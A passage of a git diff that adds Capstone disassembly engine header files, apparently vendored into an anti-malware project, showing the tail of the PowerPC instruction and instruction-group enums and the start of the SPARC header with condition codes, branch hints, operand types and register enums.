PPC_INS_FDIVS, + PPC_INS_FMADD, + PPC_INS_FMADDS, + PPC_INS_FMR, + PPC_INS_FMSUB, + PPC_INS_FMSUBS, + PPC_INS_FMUL, + PPC_INS_FMULS, + PPC_INS_FNABS, + PPC_INS_FNEG, + PPC_INS_FNMADD, + PPC_INS_FNMADDS, + PPC_INS_FNMSUB, + PPC_INS_FNMSUBS, + PPC_INS_FRE, + PPC_INS_FRES, + PPC_INS_FRIM, + PPC_INS_FRIN, + PPC_INS_FRIP, + PPC_INS_FRIZ, + PPC_INS_FRSP, + PPC_INS_FRSQRTE, + PPC_INS_FRSQRTES, + PPC_INS_FSEL, + PPC_INS_FSQRT, + PPC_INS_FSQRTS, + PPC_INS_FSUB, + PPC_INS_FSUBS, + PPC_INS_ICBI, + PPC_INS_ICBT, + PPC_INS_ICCCI, + PPC_INS_ISEL, + PPC_INS_ISYNC, + PPC_INS_LA, + PPC_INS_LBZ, + PPC_INS_LBZCIX, + PPC_INS_LBZU, + PPC_INS_LBZUX, + PPC_INS_LBZX, + PPC_INS_LD, + PPC_INS_LDARX, + PPC_INS_LDBRX, + PPC_INS_LDCIX, + PPC_INS_LDU, + PPC_INS_LDUX, + PPC_INS_LDX, + PPC_INS_LFD, + PPC_INS_LFDU, + PPC_INS_LFDUX, + PPC_INS_LFDX, + PPC_INS_LFIWAX, + PPC_INS_LFIWZX, + PPC_INS_LFS, + PPC_INS_LFSU, + PPC_INS_LFSUX, + PPC_INS_LFSX, + PPC_INS_LHA, + PPC_INS_LHAU, + PPC_INS_LHAUX, + PPC_INS_LHAX, + PPC_INS_LHBRX, + PPC_INS_LHZ, + PPC_INS_LHZCIX, + PPC_INS_LHZU, + PPC_INS_LHZUX, + PPC_INS_LHZX, + PPC_INS_LI, + PPC_INS_LIS, + PPC_INS_LMW, + PPC_INS_LSWI, + PPC_INS_LVEBX, + PPC_INS_LVEHX, + PPC_INS_LVEWX, + PPC_INS_LVSL, + PPC_INS_LVSR, + PPC_INS_LVX, + PPC_INS_LVXL, + PPC_INS_LWA, + PPC_INS_LWARX, + PPC_INS_LWAUX, + PPC_INS_LWAX, + PPC_INS_LWBRX, + PPC_INS_LWZ, + PPC_INS_LWZCIX, + PPC_INS_LWZU, + PPC_INS_LWZUX, + PPC_INS_LWZX, + PPC_INS_LXSDX, + PPC_INS_LXVD2X, + PPC_INS_LXVDSX, + PPC_INS_LXVW4X, + PPC_INS_MBAR, + PPC_INS_MCRF, + PPC_INS_MCRFS, + PPC_INS_MFCR, + PPC_INS_MFCTR, + PPC_INS_MFDCR, + PPC_INS_MFFS, + PPC_INS_MFLR, + PPC_INS_MFMSR, + PPC_INS_MFOCRF, + PPC_INS_MFSPR, + PPC_INS_MFSR, + PPC_INS_MFSRIN, + PPC_INS_MFTB, + PPC_INS_MFVSCR, + PPC_INS_MSYNC, + PPC_INS_MTCRF, + PPC_INS_MTCTR, + PPC_INS_MTDCR, + PPC_INS_MTFSB0, + PPC_INS_MTFSB1, + PPC_INS_MTFSF, + PPC_INS_MTFSFI, + PPC_INS_MTLR, + PPC_INS_MTMSR, + PPC_INS_MTMSRD, + PPC_INS_MTOCRF, + PPC_INS_MTSPR, + PPC_INS_MTSR, + PPC_INS_MTSRIN, + PPC_INS_MTVSCR, + PPC_INS_MULHD, + PPC_INS_MULHDU, + PPC_INS_MULHW, + PPC_INS_MULHWU, + PPC_INS_MULLD, + PPC_INS_MULLI, + PPC_INS_MULLW, + PPC_INS_NAND, + PPC_INS_NEG, + PPC_INS_NOP, + PPC_INS_ORI, + PPC_INS_NOR, + PPC_INS_OR, + PPC_INS_ORC, + PPC_INS_ORIS, + PPC_INS_POPCNTD, + PPC_INS_POPCNTW, + PPC_INS_QVALIGNI, + PPC_INS_QVESPLATI, + PPC_INS_QVFABS, + PPC_INS_QVFADD, + PPC_INS_QVFADDS, + PPC_INS_QVFCFID, + PPC_INS_QVFCFIDS, + PPC_INS_QVFCFIDU, + PPC_INS_QVFCFIDUS, + PPC_INS_QVFCMPEQ, + PPC_INS_QVFCMPGT, + PPC_INS_QVFCMPLT, + PPC_INS_QVFCPSGN, + PPC_INS_QVFCTID, + PPC_INS_QVFCTIDU, + PPC_INS_QVFCTIDUZ, + PPC_INS_QVFCTIDZ, + PPC_INS_QVFCTIW, + PPC_INS_QVFCTIWU, + PPC_INS_QVFCTIWUZ, + PPC_INS_QVFCTIWZ, + PPC_INS_QVFLOGICAL, + PPC_INS_QVFMADD, + PPC_INS_QVFMADDS, + PPC_INS_QVFMR, + PPC_INS_QVFMSUB, + PPC_INS_QVFMSUBS, + PPC_INS_QVFMUL, + PPC_INS_QVFMULS, + PPC_INS_QVFNABS, + PPC_INS_QVFNEG, + PPC_INS_QVFNMADD, + PPC_INS_QVFNMADDS, + PPC_INS_QVFNMSUB, + PPC_INS_QVFNMSUBS, + PPC_INS_QVFPERM, + PPC_INS_QVFRE, + PPC_INS_QVFRES, + PPC_INS_QVFRIM, + PPC_INS_QVFRIN, + PPC_INS_QVFRIP, + PPC_INS_QVFRIZ, + PPC_INS_QVFRSP, + PPC_INS_QVFRSQRTE, + PPC_INS_QVFRSQRTES, + PPC_INS_QVFSEL, + PPC_INS_QVFSUB, + PPC_INS_QVFSUBS, + PPC_INS_QVFTSTNAN, + PPC_INS_QVFXMADD, + PPC_INS_QVFXMADDS, + PPC_INS_QVFXMUL, + PPC_INS_QVFXMULS, + PPC_INS_QVFXXCPNMADD, + PPC_INS_QVFXXCPNMADDS, + PPC_INS_QVFXXMADD, + PPC_INS_QVFXXMADDS, + PPC_INS_QVFXXNPMADD, + PPC_INS_QVFXXNPMADDS, + PPC_INS_QVGPCI, + PPC_INS_QVLFCDUX, + PPC_INS_QVLFCDUXA, + PPC_INS_QVLFCDX, + PPC_INS_QVLFCDXA, + PPC_INS_QVLFCSUX, + PPC_INS_QVLFCSUXA, + PPC_INS_QVLFCSX, + PPC_INS_QVLFCSXA, + PPC_INS_QVLFDUX, + PPC_INS_QVLFDUXA, + PPC_INS_QVLFDX, + PPC_INS_QVLFDXA, + PPC_INS_QVLFIWAX, + PPC_INS_QVLFIWAXA, + PPC_INS_QVLFIWZX, + PPC_INS_QVLFIWZXA, + PPC_INS_QVLFSUX, + PPC_INS_QVLFSUXA, + PPC_INS_QVLFSX, + PPC_INS_QVLFSXA, + PPC_INS_QVLPCLDX, + PPC_INS_QVLPCLSX, + PPC_INS_QVLPCRDX, + PPC_INS_QVLPCRSX, + PPC_INS_QVSTFCDUX, + PPC_INS_QVSTFCDUXA, + PPC_INS_QVSTFCDUXI, + PPC_INS_QVSTFCDUXIA, + PPC_INS_QVSTFCDX, + PPC_INS_QVSTFCDXA, + PPC_INS_QVSTFCDXI, + PPC_INS_QVSTFCDXIA, + PPC_INS_QVSTFCSUX, + PPC_INS_QVSTFCSUXA, + PPC_INS_QVSTFCSUXI, + PPC_INS_QVSTFCSUXIA, + PPC_INS_QVSTFCSX, + PPC_INS_QVSTFCSXA, + PPC_INS_QVSTFCSXI, + PPC_INS_QVSTFCSXIA, + PPC_INS_QVSTFDUX, + PPC_INS_QVSTFDUXA, + PPC_INS_QVSTFDUXI, + PPC_INS_QVSTFDUXIA, + PPC_INS_QVSTFDX, + PPC_INS_QVSTFDXA, + PPC_INS_QVSTFDXI, + PPC_INS_QVSTFDXIA, + PPC_INS_QVSTFIWX, + PPC_INS_QVSTFIWXA, + PPC_INS_QVSTFSUX, + PPC_INS_QVSTFSUXA, + PPC_INS_QVSTFSUXI, + PPC_INS_QVSTFSUXIA, + PPC_INS_QVSTFSX, + PPC_INS_QVSTFSXA, + PPC_INS_QVSTFSXI, + PPC_INS_QVSTFSXIA, + PPC_INS_RFCI, + PPC_INS_RFDI, + PPC_INS_RFI, + PPC_INS_RFID, + PPC_INS_RFMCI, + PPC_INS_RLDCL, + PPC_INS_RLDCR, + PPC_INS_RLDIC, + PPC_INS_RLDICL, + PPC_INS_RLDICR, + PPC_INS_RLDIMI, + PPC_INS_RLWIMI, + PPC_INS_RLWINM, + PPC_INS_RLWNM, + PPC_INS_SC, + PPC_INS_SLBIA, + PPC_INS_SLBIE, + PPC_INS_SLBMFEE, + PPC_INS_SLBMTE, + PPC_INS_SLD, + PPC_INS_SLW, + PPC_INS_SRAD, + PPC_INS_SRADI, + PPC_INS_SRAW, + PPC_INS_SRAWI, + PPC_INS_SRD, + PPC_INS_SRW, + PPC_INS_STB, + PPC_INS_STBCIX, + PPC_INS_STBU, + PPC_INS_STBUX, + PPC_INS_STBX, + PPC_INS_STD, + PPC_INS_STDBRX, + PPC_INS_STDCIX, + PPC_INS_STDCX, + PPC_INS_STDU, + PPC_INS_STDUX, + PPC_INS_STDX, + PPC_INS_STFD, + PPC_INS_STFDU, + PPC_INS_STFDUX, + PPC_INS_STFDX, + PPC_INS_STFIWX, + PPC_INS_STFS, + PPC_INS_STFSU, + PPC_INS_STFSUX, + PPC_INS_STFSX, + PPC_INS_STH, + PPC_INS_STHBRX, + PPC_INS_STHCIX, + PPC_INS_STHU, + PPC_INS_STHUX, + PPC_INS_STHX, + PPC_INS_STMW, + PPC_INS_STSWI, + PPC_INS_STVEBX, + PPC_INS_STVEHX, + PPC_INS_STVEWX, + PPC_INS_STVX, + PPC_INS_STVXL, + PPC_INS_STW, + PPC_INS_STWBRX, + PPC_INS_STWCIX, + PPC_INS_STWCX, + PPC_INS_STWU, + PPC_INS_STWUX, + PPC_INS_STWX, + PPC_INS_STXSDX, + PPC_INS_STXVD2X, + PPC_INS_STXVW4X, + PPC_INS_SUBF, + PPC_INS_SUBFC, + PPC_INS_SUBFE, + PPC_INS_SUBFIC, + PPC_INS_SUBFME, + PPC_INS_SUBFZE, + PPC_INS_SYNC, + PPC_INS_TD, + PPC_INS_TDI, + PPC_INS_TLBIA, + PPC_INS_TLBIE, + PPC_INS_TLBIEL, + PPC_INS_TLBIVAX, + PPC_INS_TLBLD, + PPC_INS_TLBLI, + PPC_INS_TLBRE, + PPC_INS_TLBSX, + PPC_INS_TLBSYNC, + PPC_INS_TLBWE, + PPC_INS_TRAP, + PPC_INS_TW, + PPC_INS_TWI, + PPC_INS_VADDCUW, + PPC_INS_VADDFP, + PPC_INS_VADDSBS, + PPC_INS_VADDSHS, + PPC_INS_VADDSWS, + PPC_INS_VADDUBM, + PPC_INS_VADDUBS, + PPC_INS_VADDUDM, + PPC_INS_VADDUHM, + PPC_INS_VADDUHS, + PPC_INS_VADDUWM, + PPC_INS_VADDUWS, + PPC_INS_VAND, + PPC_INS_VANDC, + PPC_INS_VAVGSB, + PPC_INS_VAVGSH, + PPC_INS_VAVGSW, + PPC_INS_VAVGUB, + PPC_INS_VAVGUH, + PPC_INS_VAVGUW, + PPC_INS_VCFSX, + PPC_INS_VCFUX, + PPC_INS_VCLZB, + PPC_INS_VCLZD, + PPC_INS_VCLZH, + PPC_INS_VCLZW, + PPC_INS_VCMPBFP, + PPC_INS_VCMPEQFP, + PPC_INS_VCMPEQUB, + PPC_INS_VCMPEQUD, + PPC_INS_VCMPEQUH, + PPC_INS_VCMPEQUW, + PPC_INS_VCMPGEFP, + PPC_INS_VCMPGTFP, + PPC_INS_VCMPGTSB, + PPC_INS_VCMPGTSD, + PPC_INS_VCMPGTSH, + PPC_INS_VCMPGTSW, + PPC_INS_VCMPGTUB, + PPC_INS_VCMPGTUD, + PPC_INS_VCMPGTUH, + PPC_INS_VCMPGTUW, + PPC_INS_VCTSXS, + PPC_INS_VCTUXS, + PPC_INS_VEQV, + PPC_INS_VEXPTEFP, + PPC_INS_VLOGEFP, + PPC_INS_VMADDFP, + PPC_INS_VMAXFP, + PPC_INS_VMAXSB, + PPC_INS_VMAXSD, + PPC_INS_VMAXSH, + PPC_INS_VMAXSW, + PPC_INS_VMAXUB, + PPC_INS_VMAXUD, + PPC_INS_VMAXUH, + PPC_INS_VMAXUW, + PPC_INS_VMHADDSHS, + PPC_INS_VMHRADDSHS, + PPC_INS_VMINUD, + PPC_INS_VMINFP, + PPC_INS_VMINSB, + PPC_INS_VMINSD, + PPC_INS_VMINSH, + PPC_INS_VMINSW, + PPC_INS_VMINUB, + PPC_INS_VMINUH, + PPC_INS_VMINUW, + PPC_INS_VMLADDUHM, + PPC_INS_VMRGHB, + PPC_INS_VMRGHH, + PPC_INS_VMRGHW, + PPC_INS_VMRGLB, + PPC_INS_VMRGLH, + PPC_INS_VMRGLW, + PPC_INS_VMSUMMBM, + PPC_INS_VMSUMSHM, + PPC_INS_VMSUMSHS, + PPC_INS_VMSUMUBM, + PPC_INS_VMSUMUHM, + PPC_INS_VMSUMUHS, + PPC_INS_VMULESB, + PPC_INS_VMULESH, + PPC_INS_VMULESW, + PPC_INS_VMULEUB, + PPC_INS_VMULEUH, + PPC_INS_VMULEUW, + PPC_INS_VMULOSB, + PPC_INS_VMULOSH, + PPC_INS_VMULOSW, + PPC_INS_VMULOUB, + PPC_INS_VMULOUH, + PPC_INS_VMULOUW, + PPC_INS_VMULUWM, + PPC_INS_VNAND, + PPC_INS_VNMSUBFP, + PPC_INS_VNOR, + PPC_INS_VOR, + PPC_INS_VORC, + PPC_INS_VPERM, + PPC_INS_VPKPX, + PPC_INS_VPKSHSS, + PPC_INS_VPKSHUS, + PPC_INS_VPKSWSS, + PPC_INS_VPKSWUS, + PPC_INS_VPKUHUM, + PPC_INS_VPKUHUS, + PPC_INS_VPKUWUM, + PPC_INS_VPKUWUS, + PPC_INS_VPOPCNTB, + PPC_INS_VPOPCNTD, + PPC_INS_VPOPCNTH, + PPC_INS_VPOPCNTW, + PPC_INS_VREFP, + PPC_INS_VRFIM, + PPC_INS_VRFIN, + PPC_INS_VRFIP, + PPC_INS_VRFIZ, + PPC_INS_VRLB, + PPC_INS_VRLD, + PPC_INS_VRLH, + PPC_INS_VRLW, + PPC_INS_VRSQRTEFP, + PPC_INS_VSEL, + PPC_INS_VSL, + PPC_INS_VSLB, + PPC_INS_VSLD, + PPC_INS_VSLDOI, + PPC_INS_VSLH, + PPC_INS_VSLO, + PPC_INS_VSLW, + PPC_INS_VSPLTB, + PPC_INS_VSPLTH, + PPC_INS_VSPLTISB, + PPC_INS_VSPLTISH, + PPC_INS_VSPLTISW, + PPC_INS_VSPLTW, + PPC_INS_VSR, + PPC_INS_VSRAB, + PPC_INS_VSRAD, + PPC_INS_VSRAH, + PPC_INS_VSRAW, + PPC_INS_VSRB, + PPC_INS_VSRD, + PPC_INS_VSRH, + PPC_INS_VSRO, + PPC_INS_VSRW, + PPC_INS_VSUBCUW, + PPC_INS_VSUBFP, + PPC_INS_VSUBSBS, + PPC_INS_VSUBSHS, + PPC_INS_VSUBSWS, + PPC_INS_VSUBUBM, + PPC_INS_VSUBUBS, + PPC_INS_VSUBUDM, + PPC_INS_VSUBUHM, + PPC_INS_VSUBUHS, + PPC_INS_VSUBUWM, + PPC_INS_VSUBUWS, + PPC_INS_VSUM2SWS, + PPC_INS_VSUM4SBS, + PPC_INS_VSUM4SHS, + PPC_INS_VSUM4UBS, + PPC_INS_VSUMSWS, + PPC_INS_VUPKHPX, + PPC_INS_VUPKHSB, + PPC_INS_VUPKHSH, + PPC_INS_VUPKLPX, + PPC_INS_VUPKLSB, + PPC_INS_VUPKLSH, + PPC_INS_VXOR, + PPC_INS_WAIT, + PPC_INS_WRTEE, + PPC_INS_WRTEEI, + PPC_INS_XOR, + PPC_INS_XORI, + PPC_INS_XORIS, + PPC_INS_XSABSDP, + PPC_INS_XSADDDP, + PPC_INS_XSCMPODP, + PPC_INS_XSCMPUDP, + PPC_INS_XSCPSGNDP, + PPC_INS_XSCVDPSP, + PPC_INS_XSCVDPSXDS, + PPC_INS_XSCVDPSXWS, + PPC_INS_XSCVDPUXDS, + PPC_INS_XSCVDPUXWS, + PPC_INS_XSCVSPDP, + PPC_INS_XSCVSXDDP, + PPC_INS_XSCVUXDDP, + PPC_INS_XSDIVDP, + PPC_INS_XSMADDADP, + PPC_INS_XSMADDMDP, + PPC_INS_XSMAXDP, + PPC_INS_XSMINDP, + PPC_INS_XSMSUBADP, + PPC_INS_XSMSUBMDP, + PPC_INS_XSMULDP, + PPC_INS_XSNABSDP, + PPC_INS_XSNEGDP, + PPC_INS_XSNMADDADP, + PPC_INS_XSNMADDMDP, + PPC_INS_XSNMSUBADP, + PPC_INS_XSNMSUBMDP, + PPC_INS_XSRDPI, + PPC_INS_XSRDPIC, + PPC_INS_XSRDPIM, + PPC_INS_XSRDPIP, + PPC_INS_XSRDPIZ, + PPC_INS_XSREDP, + PPC_INS_XSRSQRTEDP, + PPC_INS_XSSQRTDP, + PPC_INS_XSSUBDP, + PPC_INS_XSTDIVDP, + PPC_INS_XSTSQRTDP, + PPC_INS_XVABSDP, + PPC_INS_XVABSSP, + PPC_INS_XVADDDP, + PPC_INS_XVADDSP, + PPC_INS_XVCMPEQDP, + PPC_INS_XVCMPEQSP, + PPC_INS_XVCMPGEDP, + PPC_INS_XVCMPGESP, + PPC_INS_XVCMPGTDP, + PPC_INS_XVCMPGTSP, + PPC_INS_XVCPSGNDP, + PPC_INS_XVCPSGNSP, + PPC_INS_XVCVDPSP, + PPC_INS_XVCVDPSXDS, + PPC_INS_XVCVDPSXWS, + PPC_INS_XVCVDPUXDS, + PPC_INS_XVCVDPUXWS, + PPC_INS_XVCVSPDP, + PPC_INS_XVCVSPSXDS, + PPC_INS_XVCVSPSXWS, + PPC_INS_XVCVSPUXDS, + PPC_INS_XVCVSPUXWS, + PPC_INS_XVCVSXDDP, + PPC_INS_XVCVSXDSP, + PPC_INS_XVCVSXWDP, + PPC_INS_XVCVSXWSP, + PPC_INS_XVCVUXDDP, + PPC_INS_XVCVUXDSP, + PPC_INS_XVCVUXWDP, + PPC_INS_XVCVUXWSP, + PPC_INS_XVDIVDP, + PPC_INS_XVDIVSP, + PPC_INS_XVMADDADP, + PPC_INS_XVMADDASP, + PPC_INS_XVMADDMDP, + PPC_INS_XVMADDMSP, + PPC_INS_XVMAXDP, + PPC_INS_XVMAXSP, + PPC_INS_XVMINDP, + PPC_INS_XVMINSP, + PPC_INS_XVMSUBADP, + PPC_INS_XVMSUBASP, + PPC_INS_XVMSUBMDP, + PPC_INS_XVMSUBMSP, + PPC_INS_XVMULDP, + PPC_INS_XVMULSP, + PPC_INS_XVNABSDP, + PPC_INS_XVNABSSP, + PPC_INS_XVNEGDP, + PPC_INS_XVNEGSP, + PPC_INS_XVNMADDADP, + PPC_INS_XVNMADDASP, + PPC_INS_XVNMADDMDP, + PPC_INS_XVNMADDMSP, + PPC_INS_XVNMSUBADP, + PPC_INS_XVNMSUBASP, + PPC_INS_XVNMSUBMDP, + PPC_INS_XVNMSUBMSP, + PPC_INS_XVRDPI, + PPC_INS_XVRDPIC, + PPC_INS_XVRDPIM, + PPC_INS_XVRDPIP, + PPC_INS_XVRDPIZ, + PPC_INS_XVREDP, + PPC_INS_XVRESP, + PPC_INS_XVRSPI, + PPC_INS_XVRSPIC, + PPC_INS_XVRSPIM, + PPC_INS_XVRSPIP, + PPC_INS_XVRSPIZ, + PPC_INS_XVRSQRTEDP, + PPC_INS_XVRSQRTESP, + PPC_INS_XVSQRTDP, + PPC_INS_XVSQRTSP, + PPC_INS_XVSUBDP, + PPC_INS_XVSUBSP, + PPC_INS_XVTDIVDP, + PPC_INS_XVTDIVSP, + PPC_INS_XVTSQRTDP, + PPC_INS_XVTSQRTSP, + PPC_INS_XXLAND, + PPC_INS_XXLANDC, + PPC_INS_XXLEQV, + PPC_INS_XXLNAND, + PPC_INS_XXLNOR, + PPC_INS_XXLOR, + PPC_INS_XXLORC, + PPC_INS_XXLXOR, + PPC_INS_XXMRGHW, + PPC_INS_XXMRGLW, + PPC_INS_XXPERMDI, + PPC_INS_XXSEL, + PPC_INS_XXSLDWI, + PPC_INS_XXSPLTW, + PPC_INS_BCA, + PPC_INS_BCLA, + + // extra & alias instructions + PPC_INS_SLWI, + PPC_INS_SRWI, + PPC_INS_SLDI, + + PPC_INS_BTA, + PPC_INS_CRSET, + PPC_INS_CRNOT, + PPC_INS_CRMOVE, + PPC_INS_CRCLR, + PPC_INS_MFBR0, + PPC_INS_MFBR1, + PPC_INS_MFBR2, + PPC_INS_MFBR3, + PPC_INS_MFBR4, + PPC_INS_MFBR5, + PPC_INS_MFBR6, + PPC_INS_MFBR7, + PPC_INS_MFXER, + PPC_INS_MFRTCU, + PPC_INS_MFRTCL, + PPC_INS_MFDSCR, + PPC_INS_MFDSISR, + PPC_INS_MFDAR, + PPC_INS_MFSRR2, + PPC_INS_MFSRR3, + PPC_INS_MFCFAR, + PPC_INS_MFAMR, + PPC_INS_MFPID, + PPC_INS_MFTBLO, + PPC_INS_MFTBHI, + PPC_INS_MFDBATU, + PPC_INS_MFDBATL, + PPC_INS_MFIBATU, + PPC_INS_MFIBATL, + PPC_INS_MFDCCR, + PPC_INS_MFICCR, + PPC_INS_MFDEAR, + PPC_INS_MFESR, + PPC_INS_MFSPEFSCR, + PPC_INS_MFTCR, + PPC_INS_MFASR, + PPC_INS_MFPVR, + PPC_INS_MFTBU, + PPC_INS_MTCR, + PPC_INS_MTBR0, + PPC_INS_MTBR1, + PPC_INS_MTBR2, + PPC_INS_MTBR3, + PPC_INS_MTBR4, + PPC_INS_MTBR5, + PPC_INS_MTBR6, + PPC_INS_MTBR7, + PPC_INS_MTXER, + PPC_INS_MTDSCR, + PPC_INS_MTDSISR, + PPC_INS_MTDAR, + PPC_INS_MTSRR2, + PPC_INS_MTSRR3, + PPC_INS_MTCFAR, + PPC_INS_MTAMR, + PPC_INS_MTPID, + PPC_INS_MTTBL, + PPC_INS_MTTBU, + PPC_INS_MTTBLO, + PPC_INS_MTTBHI, + PPC_INS_MTDBATU, + PPC_INS_MTDBATL, + PPC_INS_MTIBATU, + PPC_INS_MTIBATL, + PPC_INS_MTDCCR, + PPC_INS_MTICCR, + PPC_INS_MTDEAR, + PPC_INS_MTESR, + PPC_INS_MTSPEFSCR, + PPC_INS_MTTCR, + PPC_INS_NOT, + PPC_INS_MR, + PPC_INS_ROTLD, + PPC_INS_ROTLDI, + PPC_INS_CLRLDI, + PPC_INS_ROTLWI, + PPC_INS_CLRLWI, + PPC_INS_ROTLW, + PPC_INS_SUB, + PPC_INS_SUBC, + PPC_INS_LWSYNC, + PPC_INS_PTESYNC, + PPC_INS_TDLT, + PPC_INS_TDEQ, + PPC_INS_TDGT, + PPC_INS_TDNE, + PPC_INS_TDLLT, + PPC_INS_TDLGT, + PPC_INS_TDU, + PPC_INS_TDLTI, + PPC_INS_TDEQI, + PPC_INS_TDGTI, + PPC_INS_TDNEI, + PPC_INS_TDLLTI, + PPC_INS_TDLGTI, + PPC_INS_TDUI, + PPC_INS_TLBREHI, + PPC_INS_TLBRELO, + PPC_INS_TLBWEHI, + PPC_INS_TLBWELO, + PPC_INS_TWLT, + PPC_INS_TWEQ, + PPC_INS_TWGT, + PPC_INS_TWNE, + PPC_INS_TWLLT, + PPC_INS_TWLGT, + PPC_INS_TWU, + PPC_INS_TWLTI, + PPC_INS_TWEQI, + PPC_INS_TWGTI, + PPC_INS_TWNEI, + PPC_INS_TWLLTI, + PPC_INS_TWLGTI, + PPC_INS_TWUI, + PPC_INS_WAITRSV, + PPC_INS_WAITIMPL, + PPC_INS_XNOP, + PPC_INS_XVMOVDP, + PPC_INS_XVMOVSP, + PPC_INS_XXSPLTD, + PPC_INS_XXMRGHD, + PPC_INS_XXMRGLD, + PPC_INS_XXSWAPD, + PPC_INS_BT, + PPC_INS_BF, + PPC_INS_BDNZT, + PPC_INS_BDNZF, + PPC_INS_BDZF, + PPC_INS_BDZT, + PPC_INS_BFA, + PPC_INS_BDNZTA, + PPC_INS_BDNZFA, + PPC_INS_BDZTA, + PPC_INS_BDZFA, + PPC_INS_BTCTR, + PPC_INS_BFCTR, + PPC_INS_BTCTRL, + PPC_INS_BFCTRL, + PPC_INS_BTL, + PPC_INS_BFL, + PPC_INS_BDNZTL, + PPC_INS_BDNZFL, + PPC_INS_BDZTL, + PPC_INS_BDZFL, + PPC_INS_BTLA, + PPC_INS_BFLA, + PPC_INS_BDNZTLA, + PPC_INS_BDNZFLA, + PPC_INS_BDZTLA, + PPC_INS_BDZFLA, + PPC_INS_BTLR, + PPC_INS_BFLR, + PPC_INS_BDNZTLR, + PPC_INS_BDZTLR, + PPC_INS_BDZFLR, + PPC_INS_BTLRL, + PPC_INS_BFLRL, + PPC_INS_BDNZTLRL, + PPC_INS_BDNZFLRL, + PPC_INS_BDZTLRL, + PPC_INS_BDZFLRL, + + // QPX + PPC_INS_QVFAND, + PPC_INS_QVFCLR, + PPC_INS_QVFANDC, + PPC_INS_QVFCTFB, + PPC_INS_QVFXOR, + PPC_INS_QVFOR, + PPC_INS_QVFNOR, + PPC_INS_QVFEQU, + PPC_INS_QVFNOT, + PPC_INS_QVFORC, + PPC_INS_QVFNAND, + PPC_INS_QVFSET, + + PPC_INS_ENDING, // <-- mark the end of the list of instructions +} ppc_insn; + +/// Group of PPC instructions +typedef enum ppc_insn_group { + PPC_GRP_INVALID = 0, ///< = CS_GRP_INVALID + + // Generic groups + // all jump instructions (conditional+direct+indirect jumps) + PPC_GRP_JUMP, ///< = CS_GRP_JUMP + + // Architecture-specific groups + PPC_GRP_ALTIVEC = 128, + PPC_GRP_MODE32, + PPC_GRP_MODE64, + PPC_GRP_BOOKE, + PPC_GRP_NOTBOOKE, + PPC_GRP_SPE, + PPC_GRP_VSX, + PPC_GRP_E500, + PPC_GRP_PPC4XX, + PPC_GRP_PPC6XX, + PPC_GRP_ICBT, + PPC_GRP_P8ALTIVEC, + PPC_GRP_P8VECTOR, + PPC_GRP_QPX, + + PPC_GRP_ENDING, // <-- mark the end of the list of groups +} ppc_insn_group; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/capstone/include/capstone/sparc.h b/ai_anti_malware/capstone/include/capstone/sparc.h new file mode 100644 index 0000000..e33d173 --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/sparc.h @@ -0,0 +1,520 @@ +#ifndef CAPSTONE_SPARC_H +#define CAPSTONE_SPARC_H + +/* Capstone Disassembly Engine */ +/* By Nguyen Anh Quynh , 2014-2015 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +// GCC SPARC toolchain has a default macro called "sparc" which breaks +// compilation +#undef sparc + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +/// Enums corresponding to Sparc condition codes, both icc's and fcc's. +typedef enum sparc_cc { + SPARC_CC_INVALID = 0, ///< invalid CC (default) + // Integer condition codes + SPARC_CC_ICC_A = 8+256, ///< Always + SPARC_CC_ICC_N = 0+256, ///< Never + SPARC_CC_ICC_NE = 9+256, ///< Not Equal + SPARC_CC_ICC_E = 1+256, ///< Equal + SPARC_CC_ICC_G = 10+256, ///< Greater + SPARC_CC_ICC_LE = 2+256, ///< Less or Equal + SPARC_CC_ICC_GE = 11+256, ///< Greater or Equal + SPARC_CC_ICC_L = 3+256, ///< Less + SPARC_CC_ICC_GU = 12+256, ///< Greater Unsigned + SPARC_CC_ICC_LEU = 4+256, ///< Less or Equal Unsigned + SPARC_CC_ICC_CC = 13+256, ///< Carry Clear/Great or Equal Unsigned + SPARC_CC_ICC_CS = 5+256, ///< Carry Set/Less Unsigned + SPARC_CC_ICC_POS = 14+256, ///< Positive + SPARC_CC_ICC_NEG = 6+256, ///< Negative + SPARC_CC_ICC_VC = 15+256, ///< Overflow Clear + SPARC_CC_ICC_VS = 7+256, ///< Overflow Set + + // Floating condition codes + SPARC_CC_FCC_A = 8+16+256, ///< Always + SPARC_CC_FCC_N = 0+16+256, ///< Never + SPARC_CC_FCC_U = 7+16+256, ///< Unordered + SPARC_CC_FCC_G = 6+16+256, ///< Greater + SPARC_CC_FCC_UG = 5+16+256, ///< Unordered or Greater + SPARC_CC_FCC_L = 4+16+256, ///< Less + SPARC_CC_FCC_UL = 3+16+256, ///< Unordered or Less + SPARC_CC_FCC_LG = 2+16+256, ///< Less or Greater + SPARC_CC_FCC_NE = 1+16+256, ///< Not Equal + SPARC_CC_FCC_E = 9+16+256, ///< Equal + SPARC_CC_FCC_UE = 10+16+256, ///< Unordered or Equal + SPARC_CC_FCC_GE = 11+16+256, ///< Greater or Equal + SPARC_CC_FCC_UGE = 12+16+256, ///< Unordered or Greater or Equal + SPARC_CC_FCC_LE = 13+16+256, ///< Less or Equal + SPARC_CC_FCC_ULE = 14+16+256, ///< Unordered or Less or Equal + SPARC_CC_FCC_O = 15+16+256, ///< Ordered +} sparc_cc; + +/// Branch hint +typedef enum sparc_hint { + SPARC_HINT_INVALID = 0, ///< no hint + SPARC_HINT_A = 1 << 0, ///< annul delay slot instruction + SPARC_HINT_PT = 1 << 1, ///< branch taken + SPARC_HINT_PN = 1 << 2, ///< branch NOT taken +} sparc_hint; + +/// Operand type for instruction's operands +typedef enum sparc_op_type { + SPARC_OP_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + SPARC_OP_REG, ///< = CS_OP_REG (Register operand). + SPARC_OP_IMM, ///< = CS_OP_IMM (Immediate operand). + SPARC_OP_MEM, ///< = CS_OP_MEM (Memory operand). +} sparc_op_type; + +/// SPARC registers +typedef enum sparc_reg { + SPARC_REG_INVALID = 0, + + SPARC_REG_F0, + SPARC_REG_F1, + SPARC_REG_F2, + SPARC_REG_F3, + SPARC_REG_F4, + SPARC_REG_F5, + SPARC_REG_F6, + SPARC_REG_F7, + SPARC_REG_F8, + SPARC_REG_F9, + SPARC_REG_F10, + SPARC_REG_F11, + SPARC_REG_F12, + SPARC_REG_F13, + SPARC_REG_F14, + SPARC_REG_F15, + SPARC_REG_F16, + SPARC_REG_F17, + SPARC_REG_F18, + 